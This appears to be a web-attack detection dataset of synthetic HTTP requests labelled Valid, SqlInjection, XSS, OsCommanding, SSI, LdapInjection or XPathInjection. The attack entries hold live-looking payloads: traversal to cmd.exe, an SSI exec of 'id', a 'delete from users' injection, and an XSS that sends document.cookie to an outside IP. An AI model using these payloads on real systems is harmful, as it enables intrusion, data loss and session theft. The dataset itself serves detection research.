From: nTromT8u@pzcel.it
If-Modified-Since: Wed, 18 Mar 09 01:57:21 GMT
If-Unmodified-Since: Thu, 13 Aug 09 17:37:05 CET
If-Match: *
If-None-Match: "82WF.AE6RI@rmqrM99"
If-Range: Sat, 07 Apr 07 14:03:42 GMT
Max-Forwards: 0002
MIME-Version: 5.4
Pragma: nathli='r'
Proxy-Authorization: Digest realm
Authorization: Basic aGl1RXJuQTpyYVR0cg==
Range: 32-1,3888-481886
Referer: http://www.jdgq.de/s3wd.shtml
TE: deflate;q=0.3,trailers,trailers
Trailer: Accept-Charset
User-Agent: p7rZBn3AQY http://www.rgCiieef.cz
UA-CPU: 68000
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 420x9995
Via: HTTP/3.6 196.109.23.247, FTP/9.6 www.8tt8.jpg:46, HTTP/5.7 151.63.72.63:0
Transfer-Encoding: gzip
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 442 77.207.105.249 "n0tcfehentkl" 
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38697
Start - Id: 33156
class: Valid
POST /ibaohcgestx/eiesNNs7tt5bOnt/nwqitNgsnArttf5/r.3RdqRn.js? HTTP/1.1
Content-Length: 118
Content-Language: Resth
Content-Encoding: deflate
Content-Location: /tpMlsnNu.wav
Content-MD5: c2FyQW5ldXNjdG9kZ3NzaA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Jul 05 06:36:25 GMT
Last-Modified: Thu, 18 Mar 04 13:42:15 UTC
Host: www.bMoroeenil.ch:267
Connection: close
Accept: */*
Accept-Charset: hz-gb-2312, utf-8, big5, windows-1253, euc-kr
Accept-Encoding: gzip, identity
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 18.194.150.168
Cookie: pzvEtBwaeg=9562333975;vuoxnTes=exechgLT;og7wiVsi0a=22;t9qr=erXrK
Cookie2: $Version="14"
Date: Mon, 04 Jul 05 07:27:38 GMT
ETag: "vSoMsmhvuLsQyBPt"
Expect: 100-continue
From: ntsrj@mDKe5itb.net
If-Modified-Since: Tue, 29 Sep 09 14:22:50 GMT
If-Unmodified-Since: Wed, 07 May 08 22:52:16 GMT
If-Match: "I02u-i53qsK6g0zi_"
If-None-Match: "@jZfoOKS8qsbDglM"
If-Range: Wed, 19 Mar 08 24:22:20 UTC
Max-Forwards: 918
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Basic MWxlbTpkdm9T
Authorization: naeen5 brnrece=LnehUns
Range: 032610-,-244
Referer: /ss5eted.css
TE: chunked,trailers,chunked;q=0.0
Trailer: Authorization
User-Agent: sislzhinxe (uN6Px088L; aPQa9GKejy; bvT5wK; 0V0@D.C; 3N8eCsuIn)
UA-CPU: PowerPC
UA-Disp: 460,8217,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 492x1700
Via: FTP/4.1 www.deen.gif, onnm/8.1 www.ueai.png, HTTP/8.6 211.250.120.132
Transfer-Encoding: identity
Upgrade: lrh/0.7, ai4/1.8, kcj2NT/4.6
Warning: 015 24.61.213.225 "nfesi8ufreosBaeO" 
X-Forwarded-For: 121.78.223.99
X-Serial-Number: 0421946796861302632
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

r0tdnei=6480&tntnnirEe=e&YaOphprIiPo2m=hl=~;&demnftehH=iIwltip&ieea=u na&hl=5&0fI_H0arxeZ=n@leaniirlbtwr4execn

End - Id: 33156
Start - Id: 37959
class: LdapInjection
GET /IDKKTXjOT/JEgsald5djk/lVXUyI1dGeLo4lHytr/ylZ.jpeg?iuJfOyg6P=d73P4&RuEjbolH=s6FxGau7Z&hrugprtooweW=32518&Oan46bwseRgta=itM6dJQ&Rnt0ou=18761696&dx=%29++++%28++++%7C++%28++cn%3D*o%27brien*+++%29%28mail+++%3D*o+%27brien*+%29+++&tiesawhodafaEo=esaoka2ofeigiW&I3h=neg&aitt=%3DnT&OnodetZpassthruYP=%3Bchpe&Eenlehso=aMreOlianwlinkoner&psZqBdMSFfrom=uci7r&gTmtCGhttpsO=cY.fDTlA5H4&8cnaaadxee=rtnsYExeo0isc&tia6io5tprHaeoW=oCjjw HTTP/1.1
Host: www.q8n5n.de
Connection: close
Accept: application/*, video/*, video/quicktime
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 106.160.89.209
Cookie: zh=eSsaqWdr0y3  ;dnrnLwqqglaeet8=f zptaahsecowr;noesuAz=937263;Iebeii=woa;eiOintla4l=ed;atles=Hdnoanie
Cookie2: $Version="12"
Date: Wed, 21 Apr 10 13:59:40 GMT
ETag: W/"AMXW7dHrAGf@J@P3v-"
Expect: psersns=esanan
From: nteal@6riIt.fr
If-Modified-Since: Mon, 19 Jan 09 24:06:48 CET
If-Unmodified-Since: Tue, 18 Jul 06 23:11:30 GMT
If-Match: "zuCPuCjPYUsijsXd7C8d"
If-None-Match: "16GEyzl.qkhY@m5DfNc"
If-Range: "QwHLLRm_bLYIucT-M81"
Max-Forwards: 606
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: ndeT l2ftnt=toae
Range: 80461-
Referer: http://asa5uoIe.net/rsired.cfm
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/8.4 (Windows; U; WinNT 3.5; ab-ua; rv:3.9.1) Gecko/05207611
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8848x2681
Via: 3.4 227.238.161.80:3, 8.1 2.242.230.209
Transfer-Encoding: gzip
Upgrade: meng/6.1, eFlrhd/9.3, 8sNla/8.7
Warning: 700 www.fia1N.gif "guys2ngneaoLs2joonsi" "Fri, 30 Dec 05 15:06:31 CET"
X-Forwarded-For: 36.237.252.182
X-Serial-Number: 8812591
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37959
Start - Id: 17095
class: Valid
GET /YJVsystemh82I-Xprocessing-instruction1N/o@1/5a1pnrgee/hW@w4Yr6YajmKNuqsm/gUl4ngCXIwE9m@1y_/hcenncssicqypoAhmoa/cuieMosedowiRN/EfL_MtelnetXSO/uselect634r17VZmV.png?eo5seh71=Ea%29%24r%40%3Bwgetuoi&raecemt0r=228&an=alikejt9b8ksE%3FnCfropt&eszbis=25779&xmlhtpassDiDlda=91308443&1ariZtRuiYlcf=eselectkEacds1nteoi7&UHt3g-wgetdh=8tlp07st7o&childTweECxh@Xp6=72%29a%24&hnaexhiefmtiA=2767 HTTP/1.0
Host: 74.139.107.95:935
Connection: close
Accept: audio/*, video/*, image/png;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: e09nm-nannokl, n5qrthni-0vnyr
Cache-Control: no-transform
Client-ip: 53.27.195.117
Cookie: ghtratE=mx-bUx0bz2Y
Cookie2: $Version="106"
Date: Mon, 05 Feb 07 14:28:31 GMT
ETag: "HA9DQ3Ete4MaHJah"
Expect: apSs=phlfs2
From: k3av@2tSfsiE5ka.fr
If-Modified-Since: Sat, 22 May 04 02:41:28 GMT
If-Unmodified-Since: Fri, 07 Mar 08 21:16:01 CET
If-Match: "yKpEE5au3DXT@Kyqz"
If-None-Match: "-GiyR8ZpTIpi1z3UaU"
If-Range: Wed, 06 Apr 05 17:11:31 GMT
Max-Forwards: 2
MIME-Version: 9.7
Pragma: sesp=Egomo2Ah
Proxy-Authorization: NTLM NGdydGhxaGlFZnJlZW9ub2x1ZUNzc3dubnNvUmxuZnMybWg5aTN0cjZkaXQ=
Authorization: Basic ZXN0ZDpSbTdybG40
Range: 08-93302,07567-7
Referer: /etoeh/atseuMm0/7stsrr/pcdna/s9ta.mpeg
TE: deflate;q=0.1
Trailer: Accept
User-Agent: Mozilla/9.3 (Machintosh; U; PPC 1.7; se-et; rv:8.1.4) Gecko/46978748
UA-CPU: PowerPC
UA-Disp: 553,514,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4914x5963
Via: o6Md/3.2 4.192.7.30:306, 1.5 182.12.193.129, 1.3 98.66.113.166
Transfer-Encoding: gzip
Upgrade: uqn7/3.0, adaoI/9.1, aossv/2.2, skt5nb/9.3
Warning: 087 www.lusFn.tiff "cRn1mwq" 
X-Forwarded-For: 6.180.151.78
X-Serial-Number: 17174419292129745419
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17095
Start - Id: 43801
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.she1maa.be
Connection: dwahm
Accept: */*
Accept-Charset: windows-1250;q=0.2, cp-936, cp-932;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: min-fresh=44
Client-ip: 69.5.212.169
Cookie: arjat=fromighttp;oq8rude=wN5D7yB;Tj0p=ouziigrtnufde;@W0OnexecG5aR=7niHtls;wpsJuR=36159532;XAYEkK.gphp=Tlr t
Cookie2: $Version="3"
Date: Sat, 12 Mar 05 09:48:03 GMT
ETag: "4oKNvrNCIHYKhCU0chJP"
Expect: dhegnagd=62iivlh3;nnyeyrs=kyKh
From: qto7read@r8owxth.de
If-Modified-Since: Fri, 19 Mar 04 03:50:23 GMT
If-Unmodified-Since: Sat, 07 Nov 09 21:22:36 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Jul 04 16:04:14 GMT
Max-Forwards: 3010
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="h4nye"
Authorization: qutgt3 dhItvrl=r0cr5f
Range: 904036-,02113-35,44499-
Referer: /ayldYt.asp
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.5 (compatible; Konqueror/4.0; Windows NT; reegi; c8ujs; ttmeopd)
UA-CPU: Sparc
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 697x813
Via: FTP/0.9 46.63.122.3:505, 6.9 81.99.54.253:659
Transfer-Encoding: deflate
Upgrade: Vsr3e/6.8
Warning: 815 www.nitmdae.gif "rfe4pvnricgalni" 
X-Forwarded-For: 73.32.142.166
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43801
Start - Id: 506
class: Valid
GET /eBwf67-wDZlY8uidU_/gb0w7d1/vDJ84ZYvwAJUS/ttsiliynhuioeo/oshleolgti/i9efEsi6rCcttoO1hy3/sujt.jpg?D32BNo=Se%3Duautoexecn+e+tOaItmpmmw5lib&fbnmeuihiatmtu=fncw1mesb&ieireeoqlMy=351726547&eiddfmsEqrthgei=t5ul&7s34htpassv=r%29+l+&cmWAL=15836&.IU-MF8vNr=48&25sock_streamhttps=997231&ldmtaecj8e=699437&y4aeihohp=EEd0n&mhetovpeuwsOa=1eZR_mh0&aft2nars1lilaOs=a%3C&gaiaytuin6=otC7&eFt5KU3Ubg_=objectse&ar4=l+I0c HTTP/1.1
Host: www.tp7aeTylY.com
Connection: close
Accept: */*;q=0.1
Accept-Charset: gb2312;q=0.7, koi8;q=0.5, hz-gb-2312
Accept-Encoding: 
Accept-Language: dlf-ersr8r;q=0.5, aoTtHji-nsreedy
Cache-Control: no-store
Client-ip: 59.204.183.93
Cookie: r7aTee8uoi=ajeEj7sDWM_a;Yv1FXC=ylocationsfSe2yto3Hh
Cookie2: $Version="1"
Date: Mon, 11 Feb 08 12:47:06 GMT
ETag: "zBxtdas7de8q23t"
Expect: mcroe6oy
From: Csuh@ese7nna.be
If-Modified-Since: Wed, 23 Apr 08 24:21:33 GMT
If-Unmodified-Since: Tue, 07 Dec 04 21:33:27 CET
If-Match: *
If-None-Match: "M5N62oQ4fSSgvEFdJw"
If-Range: "g6uk_0ZOSnlfsAIRXonR"
Max-Forwards: 7660
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic ZW4yaWVhOm90ZFNv
Authorization: Basic bnFhOWFhZTplbGlpcg==
Range: -1,-90,0-
Referer: http://Oytuspsi.net/y85ut/ysmhrR/gd2gmbst/jnano.cfm
TE: deflate;q=0.6
Trailer: If-Modified-Since
User-Agent: Mozilla/8.2 (Machintosh; U; PPC 1.8; lt-Bb; rv:7.0.0) Gecko/81352914
UA-CPU: StrongARM
UA-Disp: 156,7636,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2278x9542
Via: 1.0 www.naewt.shtml:09, 2.0 www.tiemy.jpg:9982
Transfer-Encoding: identity
Upgrade: aikn/4.1, e9s/9.2, a6mcc7/0.2
Warning: 386 233.83.75.168 "ufears" 
X-Forwarded-For: 138.137.120.213
X-Serial-Number: 9170010950
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 506
Start - Id: 44175
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.baOnro4H6.com
Connection: elialtea
Accept: video/*, audio/x-wav
Accept-Charset: iso-8859-4;q=0.4, cp-936;q=0.1
Accept-Encoding: 
Accept-Language: r36t-lr, s-kHuxe;q=0.4
Cache-Control: max-stale=3178
Client-ip: 59.27.46.32
Cookie: tmeta50document4G-6=pix_pxXbLf-;dVWmLPwB=3897805590;meiDtaw=)
Cookie2: $Version="987"
Date: Sun, 19 Jun 05 05:35:03 GMT
ETag: "@pQtfkHChnDufap0Uh"
Expect: 100-continue
From: ulnbn@Ssrnr.st
If-Modified-Since: Wed, 16 Apr 08 16:49:15 GMT
If-Unmodified-Since: Mon, 07 Jan 08 22:52:19 UTC
If-Match: *
If-None-Match: "SzWwgNJNdiIahrV"
If-Range: Sun, 02 Aug 09 03:40:03 CET
Max-Forwards: 3
MIME-Version: 3.5
Pragma: t=n
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: Digest username="jhemspy"
Range: 5-,-97,-5
Referer: http://www.mgnz.st/lanut/oCar/i1aUUasl.jpeg
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/8.1 (compatible; MSIE 5.2; Open BSD i386; edsn; 7soan; Gutdk)
UA-CPU: Sparc
UA-Disp: 199,7941,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 389x154
Via: 0.6 252.49.31.229:7678
Transfer-Encoding: compress
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 103.223.39.110
X-Serial-Number: 386658457153334430
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44175
Start - Id: 3388
class: Valid
GET /ek-OKNZY.oFnIXn@/6EkQ377l/khonaxNads8e7eigMae/Ps-lA.asp? HTTP/1.1
Host: www.etivte.gov
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: c-raebrea;q=0.2, ia-Kx9els;q=0.5, iisTuiea-ltehhnOe
Cache-Control: no-cache
Client-ip: 9.201.38.231
Cookie: xcaas5Cvhscln=97
Cookie2: $Version="4"
Date: Wed, 09 Jan 08 20:08:15 CET
ETag: "kq7hXu.qVwbcDDNwP6MF"
Expect: 100-continue
From: 6gOqlo@tI0ceenh.st
If-Modified-Since: Sun, 18 Apr 10 13:57:08 CET
If-Unmodified-Since: Sun, 08 Nov 09 09:42:07 CET
If-Match: *
If-None-Match: "V4HyZsxjGxPkWEPz"
If-Range: Sun, 03 Jun 07 05:32:11 CET
Max-Forwards: 99
MIME-Version: 2.0
Pragma: ydlhimqc='aeW9ekjo'
Proxy-Authorization: Basic am1YaThzdHQ6MWFtYWEyOA==
Authorization: Basic ZXFVbzpyemV2
Range: 163-6091,597027-
Referer: http://www.m0eeeoh.ch/hent.jpg
TE: trailers
Trailer: Upgrade
User-Agent: hEbojnei
UA-CPU: MIPS
UA-Disp: 415,5434,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 571x686
Via: 6.7 44.174.140.18:7, HTTP/2.0 www.do0nero7.gif:7577, goenou/6.3 www.eyniVnhq.html
Transfer-Encoding: identity
Upgrade: uwe/6.3, steht/1.0, iaee/6.9, ifisie/0.5
Warning: 250 130.135.208.216 "daalttigaipv" 
X-Forwarded-For: 253.99.67.7
X-Serial-Number: 339495405451
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3388
Start - Id: 39964
class: SSI
GET /ig3y1565rfGlz/dRhWWmY38TF/brwtez6eien8t/Y5replaceusrfdadmin/oeugccmnebmnxA6wrabe/nN/TUY_dUk/ionudsptk/o-SaSMItovunv/t4GdTqmDD_xFsB/huiIelto.cgi?noOdf=nruzcmatsg&ekN4rl=%3C%21++%23%3C%21--+%23exec+cmd%3D%22id%22--%3E&Insietlcrzlt=deerlscIfagseS%26te HTTP/1.1
Host: 50.195.74.110
Connection: close
Accept: application/*;q=0.2, audio/x-wav;q=0.5, text/plain
Accept-Charset: euc-tw
Accept-Encoding: gzip;q=0.1, compress;q=0.5, deflate;q=0.7, deflate;q=0.9
Accept-Language: aa-ede, aenLto-ttsWAtsm, e-Itbqa;q=0.2
Cache-Control: max-stale=50393
Client-ip: 183.52.12.49
Cookie: Suwfpltaar0=8;ylgdytnsuoeant=93438;3R3Z-4pob=120438001;LihockBdrnf=1883;E1qcopy6.=57;mophao=1XZEJy
Cookie2: $Version="03"
Date: Sun, 24 May 09 01:17:15 UTC
ETag: "JFB77.k_xgNM-ycpG"
Expect: 100-continue
From: ebwhssyt@lxhcar.gov
If-Modified-Since: Thu, 23 Jul 09 20:11:20 GMT
If-Unmodified-Since: Tue, 19 Aug 08 23:40:33 UTC
If-Match: *
If-None-Match: *
If-Range: "YavZqkjOeTOFp6nQ"
Max-Forwards: 2
MIME-Version: 1.4
Pragma: o=s8aa
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: Basic ZHJpdGpwdm86aXFmZWZj
Range: 67904-931063
Referer: http://www.drniq5.biz/s3csjb/zOtd/1Rtamy/d5iedriv/vepm.gif
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: x4Si@5u http://www.eiteg0s.uk
UA-CPU: Sparc
UA-Color: color16
Via: 7.0 226.232.160.153, FTP/7.8 68.234.143.202
Transfer-Encoding: deflate
Upgrade: snt/4.7, 9diah/5.8, zl6/2.7
Warning: 323 13.31.57.254 "dinvatrVko1snr" 
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39964
Start - Id: 2667
class: Valid
GET /iUPuiTfo6dCQ_ph/gUiEk294KFgCJMd-d-BS/eUnPU9-_lQjd756.png?eoee1rCin=2nautreueraeust&Rcnph-OJF0Ptd=t.rPT4jg9S&LSinuMLGEDP.=7&oap=1hra&z7RhdwgetdPulul=b%5Cuiadminii&shorlt7v=+bd&o44=4mjrnbieHnjs&pattd7x=mglw&5c7I1exec=31526053&UD0se1KnQXj=etueriadyicaqbr&adlh=hrmcle&hrltiekn1iexps=33473733 HTTP/1.1
Host: 128.8.176.98
Connection: keep-alive
Accept: */*
Accept-Charset: utf-8, windows-1255, euc-cn;q=0.7, iso-10646-ucs-2, euc-jp
Accept-Encoding: identity, identity;q=0.3, compress, compress;q=0.9, compress;q=0.9
Accept-Language: bxq9-yo;q=0.6
Cache-Control: no-cache
Client-ip: 167.36.209.178
Cookie: vGf9hzosct=iyrntg;8MUF=mstqahs5i+2;due32eidtSe=rtevalewgetkE?msaeht&tchildIt ;3swa=be;tiOscriptU3FPf=4407217;ncvSTk@g@@W=scy=a
Cookie2: $Version="95"
Date: Thu, 25 Aug 05 23:37:50 UTC
ETag: W/"YgfCl574zFZDDyBiItIN"
Expect: erRtfmbi=aeptu
From: ovamHuqy@MlywzI.fr
If-Modified-Since: Wed, 29 Oct 08 10:32:05 UTC
If-Unmodified-Since: Thu, 19 Apr 07 19:50:00 GMT
If-Match: "RFAgjj0sxyNuAhH.JE"
If-None-Match: "JJFw.@Ku-i.LQOEM1"
If-Range: *
Max-Forwards: 0800
MIME-Version: 4.9
Pragma: h1megoy9='ct0'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM OWRlTmFlb25Bb2hjZXRybXdmbG5laWcxZUNyaWxpb2U=
Range: -23,-6679
Referer: http://hhtelerm.st/isos/e78l4ds.aspx
TE: trailers,chunked;q=0.0
Trailer: Accept-Charset
User-Agent: teRnos0/2.0.0
UA-CPU: StrongARM
UA-Disp: 6089,3163,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 486x934
Via: 1.8 www.aredte.htm, 1.6 www.2LdtrUEa.jpg, ttfk0Q/5.2 www.ahcHEs.jpeg
Transfer-Encoding: identity
Upgrade: dubal/9.7, rce/1.2
Warning: 749 www.okXda0.jpeg:63 "nQde" 
X-Forwarded-For: 196.188.242.124
X-Serial-Number: 8136074594585
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2667
Start - Id: 48534
class: XPathInjection
PUT /oeAitoleteia/7insdoa/xhih81/-I9m/ebk9ZxkJu/ml.cfm? HTTP/1.1
Content-Length: 129
Content-Language: i,ova
Content-Encoding: deflate
Content-Location: http://i0sTri.fr/ntex7/lEsmec/usetatt/30dm.swf
Content-MD5: cWVUbGo0a3JUa3JFaHR0cw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 21 Jan 10 01:34:40 UTC
Last-Modified: Fri, 05 Feb 10 23:49:04 UTC
Host: 36.249.79.3
Connection: close
Accept: audio/basic, audio/x-wav;q=0.7
Accept-Charset: windows-1254;q=0.0
Accept-Encoding: gzip;q=0.4
Accept-Language: 4mr-iEbtllt;q=0.7, timjs-mIjulsao, E-lct;q=0.2, me0lm-ws3if
Cache-Control: no-transform
Client-ip: 61.82.105.60
Cookie: ienmErlo=;;G_D6ladminNSetcVm=aVPKOv;eloslzvasL5ai=7;fXoJ6Zi=33493;u0XdexhiScfeihe=e4Hy-Q
Cookie2: $Version="5"
Date: Tue, 24 Apr 07 01:50:51 UTC
ETag: "GcXnmUBFxWJV.V3_q"
Expect: 100-continue
From: l7hgtc@eorr.be
If-Modified-Since: Fri, 03 Aug 07 16:03:48 CET
If-Unmodified-Since: Sat, 15 Aug 09 14:53:12 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 27 Nov 09 10:38:06 GMT
Max-Forwards: 1
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: hheeaG dehOfn=ka3m
Authorization: Digest cnonce="texSdoTP"
Range: 8664-
Referer: /twtlcah/Dadsdhm/ktpRso/eig741e/beciOore.asmx
TE: deflate;q=0.8,chunked;q=0.4,trailers
Trailer: Max-Forwards
User-Agent: hBWWojp http://www.Ag9db.be
UA-CPU: StrongARM
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3038x174
Via: 3.2 www.eeRl.html, 0.2 12.228.50.7:6
Transfer-Encoding: identity
Warning: 997 208.8.7.32:24 "H4ott" "Sun, 14 Mar 04 08:06:29 GMT"
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gc34ysosd6s=5874&OnAsreeeeybt=ec8a'  or path/child::node()[position()=N]    or  'Eewetsyx'   =    '

End - Id: 48534
Start - Id: 47691
class: XSS
GET /3oU/oUL.J.gDBGEMjf.jpeg?zdotepeanEdZw=%3Cimg++src%3D+%22livescript%3A%5Bwindow.open%28%27http%3A%2F%2F130.38.114.247%2Fnetrel.nsf%27%2Bdocument.cookie%29%3B%5D++++++%22%3E&uflsqo9scvbe=9738&x3ZlhobjectSid=eso+orcinsert5s+e&itfzt2zweta=sock_streamsancehoa&xtntpcpm=%26l-kr%25estpRishutdown51&ma0ttela=kQqA_W&eottCdteoByhiR=sirstsalt&yvSnynosolqeor=a+eotg&cbodydV7oSx69X=n HTTP/1.1
Host: www.rereet5sr.uk
Connection: 4gaA
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: dmd-tn, 0-enlN;q=0.1, ayi-e
Cache-Control: nws=sTatsnse
Client-ip: 181.7.130.231
Cookie: Eomdthteiacdi=oE3tr5bin;1ok=e/uevusr etg
Cookie2: $Version="676"
Date: Fri, 19 Jan 07 03:05:03 UTC
ETag: "q6nx_Fxx.CKJc6Kk"
Expect: wmt6or
From: maxEoc8e@ae6eyisrl4.biz
If-Modified-Since: Tue, 20 Jul 04 07:45:42 CET
If-Unmodified-Since: Sat, 21 Feb 04 02:04:40 UTC
If-Match: *
If-None-Match: *
If-Range: "a-ZpQlzTiI8L.Fl3"
Max-Forwards: 4
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: sxorov avcea=rose
Authorization: Basic dDlyeWxyYUg6ZXdvTHQzZQ==
Range: 57-,235-9884,973-85
Referer: http://y5olv.de/snoeoie/lnr3tlHq.aspx
TE: trailers,deflate;q=0.8,gzip;q=0.5
Trailer: From
User-Agent: alhngra81csmMwothts
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 934x7117
Via: 9.4 www.ao3itLj.html, FTP/2.7 104.74.153.1:652
Transfer-Encoding: gzip
Upgrade: e33s9E/0.6
Warning: 797 10.182.112.205:62 "mparhiqesWqMnqIet2" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47691
Start - Id: 48500
class: XPathInjection
POST /z8OpwE/tmpSW/betweenYi3/0RhIvWpA6nF3lTgmSn_1/lekQ-dUFiIrT@xBzmIl.cgi? HTTP/1.1
Content-Length: 408
Content-Language: lno
Content-Encoding: compress
Content-Location: /feoo/kn5toi/sldReaIi.msf
Content-MD5: aXJhaW9mZWVhaW9PZWM2bg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 26 Oct 07 18:12:09 GMT
Last-Modified: Sun, 23 Apr 06 02:18:15 CET
Host: 4.146.16.148
Connection: keep-alive
Accept: image/png, image/*
Accept-Charset: windows-1251
Accept-Encoding: 
Accept-Language: re-oyf0, rhnde-i7, eistrfy-ayedc
Cache-Control: max-age=31450
Client-ip: 186.162.234.129
Cookie: uytsnaeasiulot=nane9ripm0o
Cookie2: $Version="932"
Date: Sat, 14 Jul 07 17:22:47 CET
ETag: W/"Z8k6MID8rdOhM91kgfF"
Expect: 9sb4l
From: numhoTo@rsni1ore.com
If-Modified-Since: Wed, 30 Aug 06 15:59:44 CET
If-Unmodified-Since: Mon, 02 Jul 07 23:15:02 UTC
If-Match: "HEIPNYUXvoM-pIeztMy"
If-None-Match: *
If-Range: Fri, 26 Aug 05 07:49:20 UTC
Max-Forwards: 14
MIME-Version: 1.8
Pragma: l3='yaotc'
Authorization: NTLM ZW5hZmVlbm9yYU9mbXNuZ256M1llZTRvSml6dG9GcjZpcHh0c2VDb3l0bg==
Referer: http://pwsso.com/xetdohe/o3Eo/itlhcVte.pl
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/4.4 (Machintosh; U; PPC Mac OS X 0.2; ao-mi; rv:2.4.7) Gecko/07297210
Via: eae/2.8 www.0p9a.htm, HTTP/5.6 37.124.9.63
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 01871
----: -------------

rauohud=tsainns&EAm=9nda&nlreTAEeFe=d:&_pbgsoundMiwindow.openaMJY=Recuon&hH.HC=1717&en=Oeiys/34d/mdsbs/child::node()[  position()=28]     |  hgeds/6a/It/child::text()[position()=02] or '40tjo2ht'  ='&afteirzefa=9kstfriaathneereod&tessc=ro&qdH5cez=gAehldsmes&once=dAetn(d=aryrbtk0document&gpOdrltSo=sawqbrcsoerq8g&fqhny2=90&eee0pm=nqtntzaShNToTl

End - Id: 48500
Start - Id: 42097
class: SqlInjection
GET /eKAA/aTra/cvaruxWwindow.opennBzB/Ho2peYnw/H-8opt/h3gmhZP9pNT8696unW7/ismQlvpjjq/20yT-l.shtml?wee=8913554&zdaiseaeh=awsdyAjr0st&wdtIiti=83628492&nxtihad5ougots=%27++++%29%3B+++delete+from++users%3B+commit%3B+++++dummy%28++%27 HTTP/1.1
Host: www.ryojseba.net
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: dknntru-Bfavle, aamufe2s-SoenafA;q=0.3, un7-tw6it;q=0.3, m6-eabetnl, d-s2
Cache-Control: min-fresh=46
Client-ip: 195.244.99.47
Cookie: GNZYv=niijtxhhttpieo2lruds8u;lgYxFGnph-DyIbM=aCcaCLWSw;srjO=965260
Cookie2: $Version="32"
Date: Mon, 25 Jan 10 24:30:21 UTC
ETag: "ducLTVBou0lyuo32LMT"
Expect: troiSdth=erstetro;ir9otau
From: LzmxnseS@evezd.fr
If-Modified-Since: Thu, 09 Nov 06 21:49:12 UTC
If-Unmodified-Since: Fri, 02 Nov 07 22:48:49 CET
If-Match: *
If-None-Match: "ou0YwSWz9LPv0Awbi"
If-Range: Sun, 25 Oct 09 10:38:31 UTC
Max-Forwards: 37
MIME-Version: 0.9
Pragma: hnqnezor=1Pee
Proxy-Authorization: Digest uri=/wSot5/LjitAzt.php3
Authorization: Digest qop=auth-int
Range: 106-1944,67279-,2-
Referer: http://www.trtizns.be/s0ri/gaEBthh/ar0e.pdf
TE: trailers,trailers
Trailer: User-Agent
